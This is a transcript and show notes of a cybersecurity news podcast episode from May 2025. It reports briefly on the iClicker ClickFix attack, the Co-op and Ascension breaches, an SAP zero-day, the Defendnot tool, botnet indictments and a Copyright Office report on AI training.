Podcasts
CyberWire Daily
Ep 2306
The CyberWire Daily Podcast 5.12.25
Ep 2306 | 5.12.25

No quick fix for a ClickFix attack.

Show Notes
Transcript

A major student engagement platform falls victim to the ClickFix social engineering attack. Google settles privacy allegations with Texas for over one point three billion dollars. Stores across the UK face empty shelves due to an ongoing cyberattack. Ascension Health reports that over 437,000 patients were affected by a third-party data breach. A critical zero-day vulnerability in SAP NetWeaver is being actively exploited. Researchers uncover two major cybersecurity threats targeting IT admins and cloud systems. U.S. prosecutors charge three Russians and one Kazakhstani in connection with the takedown of two major botnets. A new tool disables Microsoft Defender by tricking Windows into thinking a legitimate antivirus is installed. Tim Starks, Senior Reporter from CyberScoop, discusses congressional reactions to White House budget cut proposals for CISA. Fair use faces limits in generative AI.

 

Today is Monday May 12th 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

A major student engagement platform falls victim to the ClickFix social engineering attack. 

iClicker is a student engagement platform used by about 5,000 instructors and 7 million students at U.S. colleges, including major universities like Michigan and Florida. Between April 12 and 16, 2025, its website was compromised in a ClickFix social engineering attack. A fake CAPTCHA tricked visitors into running a malicious PowerShell script by copying it from the clipboard into the Windows Run dialog. Once executed, the script connected to a remote server to fetch more malware. Depending on the visitor, the attack either gave hackers full access or downloaded harmless software to avoid detection. The likely payload was an information stealer, targeting credentials, browser data, and cryptocurrency wallets. iClicker confirmed the breach on May 6, stating its apps and data were unaffected and the vulnerability had been fixed. The number of affected users is still unknown.

Google settles privacy allegations with Texas for over one point three billion dollars. 

Google will pay $1.375 billion to Texas to settle claims it secretly tracked users’ locations, private browsing activity, and biometric data without consent. The lawsuit, led by Attorney General Ken Paxton, alleged that Google continued tracking users even with location services off and used the data for advertising profits. It also claimed Google collected biometric data like facial geometry without proper consent. Google denies wrongdoing but has since updated its policies. The settlement is one of the largest U.S. privacy-related fines.

Stores across the UK face empty shelves due to an ongoing cyberattack. 

Co-op stores across the UK are facing empty shelves due to an ongoing cyberattack that began two weeks ago. Fearing hackers may still have access, the company has kept key logistics systems offline, severely disrupting deliveries. Staff report depot shipments are below 20% of normal, with meat, dairy, and eggs prioritized due to perishability laws. Other items like produce, canned goods, and cigarettes remain scarce. CEO Shirine Khoury-Haq confirmed customer and member data was compromised, though the nature of the hack is still unclear. Despite all stores remaining open, recovery is expected to take weeks. On the Scottish island of Islay, where Co-op is the only major grocer, special delivery processes are in place. Co-op, a member-owned co-operative, operates over 3,000 locations and does not have to report financial losses to public markets.

Ascension Health reports that over 437,000 patients were affected by a third-party data breach. 

Ascension Health reported that over 437,000 patients were affected by a data breach tied to a third-party vendor’s software vulnerability, not its own systems. Hackers exploited this flaw to steal sensitive data, including names, contact details, Social Security numbers, and health information. The breach likely stemmed from the Cl0p ransomware group’s December 2023 attack on Cleo’s file transfer platform. Impacted patients are being offered two years of free credit monitoring. This breach is smaller than Ascension’s May 2024 ransomware incident affecting 5.6 million.

A critical zero-day vulnerability in SAP NetWeaver is being actively exploited. 

A critical zero-day vulnerability in SAP NetWeaver (CVE-2023-7629) is being actively exploited by Chinese state-sponsored hackers. The flaw, found in the Internet Communication Manager (ICM) component, allows unauthenticated remote code execution via crafted HTTP requests. Despite emergency patches, many SAP systems remain exposed. Attackers are targeting high-value sectors like finance and manufacturing to steal sensitive data and establish persistent access. Researchers found that the custom malware, dubbed “SAPphire,” uses encrypted communication over SAP protocols, making detection difficult. The attack chain begins with a malicious SOAP request that exploits memory corruption and delivers a reverse shell. From there, attackers modify SAP configurations to maintain access. The sophisticated campaign raises concerns about supply chain risks and has already caused operational disruptions across critical sectors including healthcare, government, and infrastructure.

Researchers uncover two major cybersecurity threats targeting IT admins and cloud systems. 

Varonis has uncovered two major cybersecurity threats targeting IT admins and cloud systems. First, attackers are using SEO poisoning to trick admins into downloading malware disguised as legitimate tools. These fake downloads can install backdoors like SMOKEDHAM or monitoring software, enabling credential theft and data exfiltration. In one case, nearly a terabyte of data was stolen, followed by a ransomware attack. Separately, Varonis found a critical root access flaw in Azure’s AZNFS-mount utility, used in HPC and AI workloads. The bug, present in versions up to 2.0.10, lets unprivileged users escalate to root by exploiting environment variables. Though Microsoft rated it low severity, the risk of full cloud compromise is significant. Varonis urges immediate patching to version 2.0.11 and recommends a Defense in Depth strategy to reduce exposure.

U.S. prosecutors charge three Russians and one Kazakhstani in connection with the takedown of two major botnets. 

U.S. prosecutors have charged three Russians and one Kazakhstani in connection with the takedown of two major botnets, Anyproxy and 5socks. The suspects allegedly ran a malware campaign that hijacked outdated wireless routers, converting them into proxy servers for rent on the seized websites. The botnets offered over 7,000 proxies, generating $46 million over 20 years. The operation, named “Moonlander,” involved international cooperation and technical analysis from Lumen Technologies. Many infected routers were found in Oklahoma, with global reach across 80+ countries. The FBI warns that outdated routers, especially older Linksys, Cisco, and TP-Link models, are prime targets for exploitation by threat actors, including Chinese hackers. Two defendants also face charges for using false identities to register domains. Authorities urge replacing unsupported routers to avoid similar compromises.

A new tool disables Microsoft Defender by tricking Windows into thinking a legitimate antivirus is installed. 

A new tool called Defendnot disables Microsoft Defender by exploiting the Windows Security Center (WSC) API, tricking Windows into thinking a legitimate antivirus is installed. Created by GitHub developer “es3n1n,” Defendnot registers a fake antivirus product using reverse-engineered interactions with the undocumented WSC API, bypassing Microsoft’s integrity checks by injecting its code into trusted processes like Task Manager. Once registered, Windows automatically disables Defender to avoid conflicts. While the tool requires admin privileges and persistent installation to survive reboots, it poses a risk if abused by malware developers. Security experts warn that although Defendnot showcases impressive technical skill, it highlights a significant security gap in how Windows handles AV product registration. The tool builds on the developer’s earlier project, no-defender, and underscores the need for better safeguards in WSC’s architecture.

Next up, I welcome back Tim Starks, Senior Reporter from CyberScoop, discussing congressional reactions to White House budget cut proposals for CISA.

We’ll be right back

Welcome back. You can find links to the articles Tim and I discussed in the show notes. 

Fair use faces limits in generative AI. 

Late last Friday, in a move as quietly timed as it was politically charged, the U.S. Copyright Office released a pre-publication version of Part 3 of its AI study—just hours before its top leadership was abruptly dismissed. The 108-page report tackles how copyright law, especially fair use, should apply to AI training. It argues that copying during training is presumptively infringing, and that even the model’s weights may embed protected expression. The report emphasizes that fair use hinges on how the AI is ultimately used, not just how it’s trained. Particularly striking is the Office’s endorsement of a novel “market dilution” theory, warning that AI-generated content could flood and devalue markets—even without direct copying. While courts are not bound by the report, its detailed reasoning could shape the 40+ ongoing copyright cases involving generative AI. Whether the report survives changing political winds remains uncertain—but its legal implications are already rippling outward.


And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

Don’t forget to check out the “Grumpy Old Geeks'' podcast where I contribute to a regular segment on Jason and Brians’s show, every week. You can find “Grumpy Old Geeks'' where all the fine podcasts are listed. 

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.

CyberWire Daily
Podcast Info
HOST(S):
Dave Bittner
Dave Bittner is a security podcast host and one of the founders at CyberWire. He's a creator, producer, videographer, actor, experimenter, and entrepreneur. He's had a long career in the worlds of television, journalism and media production, and is one of the pioneers of non-linear editing and digital storytelling.
Schedule: Monday-Friday
Creator: CyberWire, Inc.